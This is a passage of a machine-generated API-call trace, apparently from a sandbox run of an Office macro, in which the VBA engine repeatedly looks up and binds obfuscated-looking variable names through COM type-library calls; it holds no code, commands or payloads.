| out: lpWideCharStr="_B_var_YAA4AAA") returned 15 [0068.390] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.390] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YAA4AAA", lHashVal=0x10599f, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.390] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.390] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.390] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YAA4AAA", lHashVal=0x10599f, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.390] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.390] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.390] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YAA4AAA", lHashVal=0x10599f, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.390] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.390] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.390] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YAA4AAA", lHashVal=0x10599f, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.390] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.390] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.390] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc15b2, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_YAA4AAA") returned 15 [0068.390] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YAA4AAA", lHashVal=0x10599f, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x59005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x59005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0) returned 0x0 [0068.390] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2266 | out: _Dst=0x145020) returned 0x0 [0068.391] realloc (_Block=0x0, _Size=0xc0) returned 0x251d0e0 [0068.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba22b6, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="nUcABc") returned 7 [0068.391] ITypeComp:RemoteBind (in: This=0x665ba60, szName="nUcABc", lHashVal=0x106f22, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba22b6, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="nUcABc") returned 7 [0068.391] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="nUcABc", lHashVal=0x106f22, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba22b6, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="nUcABc") returned 7 [0068.391] ITypeComp:RemoteBind (in: This=0x665bd30, szName="nUcABc", lHashVal=0x106f22, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.391] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nUcABc") returned 0x106f22 [0068.391] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="nUcABc" | out: _Dst="nUcABc") returned 0x0 [0068.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="nUcABc") returned 7 [0068.392] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.392] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="nUcABc", lHashVal=0x106f22, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.392] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.392] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.392] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="nUcABc", lHashVal=0x106f22, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.392] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.392] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.392] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="nUcABc", lHashVal=0x106f22, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.392] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.392] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.392] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="nUcABc", lHashVal=0x106f22, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.392] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba22b6, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="nUcABc") returned 7 [0068.392] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="nUcABc", lHashVal=0x106f22, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.392] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d60 [0068.392] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x7, _Src=0x3ba22b6 | out: _Dst=0x67c2d60) returned 0x0 [0068.392] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_nUcABc") returned 0x10e9cb [0068.392] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_nUcABc" | out: _Dst="_B_var_nUcABc") returned 0x0 [0068.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_nUcABc") returned 14 [0068.392] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.392] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_nUcABc", lHashVal=0x10e9cb, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.392] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.392] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.392] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_nUcABc", lHashVal=0x10e9cb, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.392] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.392] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.392] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_nUcABc", lHashVal=0x10e9cb, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.392] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.392] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.392] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_nUcABc", lHashVal=0x10e9cb, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.392] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.392] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.392] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc15e2, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_nUcABc") returned 14 [0068.392] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_nUcABc", lHashVal=0x10e9cb, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x6e005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x6e005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0) returned 0x0 [0068.392] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba22b6 | out: _Dst=0x145020) returned 0x0 [0068.393] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf17100, cb=0x400) returned 0xafa7bd0 [0068.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba228e, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="uAAQA1") returned 7 [0068.393] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uAAQA1", lHashVal=0x1071ab, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba228e, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="uAAQA1") returned 7 [0068.393] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uAAQA1", lHashVal=0x1071ab, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba228e, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="uAAQA1") returned 7 [0068.393] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uAAQA1", lHashVal=0x1071ab, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.393] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uAAQA1") returned 0x1071ab [0068.393] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="uAAQA1" | out: _Dst="uAAQA1") returned 0x0 [0068.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="uAAQA1") returned 7 [0068.393] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.393] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="uAAQA1", lHashVal=0x1071ab, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.393] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.393] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.393] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="uAAQA1", lHashVal=0x1071ab, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.393] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.393] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.393] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="uAAQA1", lHashVal=0x1071ab, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.393] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.393] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.393] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="uAAQA1", lHashVal=0x1071ab, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.393] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba228e, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="uAAQA1") returned 7 [0068.393] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uAAQA1", lHashVal=0x1071ab, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.393] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d60 [0068.394] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x7, _Src=0x3ba228e | out: _Dst=0x67c2d60) returned 0x0 [0068.394] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_uAAQA1") returned 0x10ec54 [0068.394] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_uAAQA1" | out: _Dst="_B_var_uAAQA1") returned 0x0 [0068.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_uAAQA1") returned 14 [0068.394] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.394] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_uAAQA1", lHashVal=0x10ec54, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.394] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.394] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.394] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_uAAQA1", lHashVal=0x10ec54, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.394] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.394] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.394] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_uAAQA1", lHashVal=0x10ec54, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.394] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.394] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.394] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_uAAQA1", lHashVal=0x10ec54, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.394] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.394] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.394] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1612, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_uAAQA1") returned 14 [0068.394] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uAAQA1", lHashVal=0x10ec54, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x75005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x75005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0068.394] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba228e | out: _Dst=0x145020) returned 0x0 [0068.394] ITypeComp:RemoteBind (in: This=0x665ba60, szName="CUAA1kk", lHashVal=0x107518, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba230a, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="CUAA1kk") returned 8 [0068.394] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="CUAA1kk", lHashVal=0x107518, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba230a, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="CUAA1kk") returned 8 [0068.394] ITypeComp:RemoteBind (in: This=0x665bd30, szName="CUAA1kk", lHashVal=0x107518, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.394] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CUAA1kk") returned 0x107518 [0068.394] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="CUAA1kk" | out: _Dst="CUAA1kk") returned 0x0 [0068.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="CUAA1kk") returned 8 [0068.394] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.394] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="CUAA1kk", lHashVal=0x107518, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.394] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.395] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.395] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="CUAA1kk", lHashVal=0x107518, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.395] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.395] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.395] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="CUAA1kk", lHashVal=0x107518, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.395] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.395] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.395] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="CUAA1kk", lHashVal=0x107518, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.395] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba230a, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="CUAA1kk") returned 8 [0068.395] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="CUAA1kk", lHashVal=0x107518, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.395] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.395] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba230a | out: _Dst=0x67c2d60) returned 0x0 [0068.395] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_CUAA1kk") returned 0x10789c [0068.395] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_CUAA1kk" | out: _Dst="_B_var_CUAA1kk") returned 0x0 [0068.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_CUAA1kk") returned 15 [0068.395] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.395] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_CUAA1kk", lHashVal=0x10789c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.395] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.395] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.395] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_CUAA1kk", lHashVal=0x10789c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.395] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.395] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.395] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_CUAA1kk", lHashVal=0x10789c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.395] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.395] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.395] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_CUAA1kk", lHashVal=0x10789c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.395] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.395] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.395] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1642, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_CUAA1kk") returned 15 [0068.396] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_CUAA1kk", lHashVal=0x10789c, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x43005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x43005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0) returned 0x0 [0068.396] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba230a | out: _Dst=0x145020) returned 0x0 [0068.396] IMalloc:Realloc (This=0x7fefec05380, pv=0xafa6fa0, cb=0x800) returned 0x62b9100 [0068.396] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zCCoA1", lHashVal=0x10879e, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2332, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="zCCoA1") returned 7 [0068.396] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zCCoA1", lHashVal=0x10879e, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2332, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="zCCoA1") returned 7 [0068.396] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zCCoA1", lHashVal=0x10879e, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.397] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zCCoA1") returned 0x10879e [0068.397] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="zCCoA1" | out: _Dst="zCCoA1") returned 0x0 [0068.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="zCCoA1") returned 7 [0068.397] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.397] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zCCoA1", lHashVal=0x10879e, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.397] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.397] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.397] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zCCoA1", lHashVal=0x10879e, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.397] 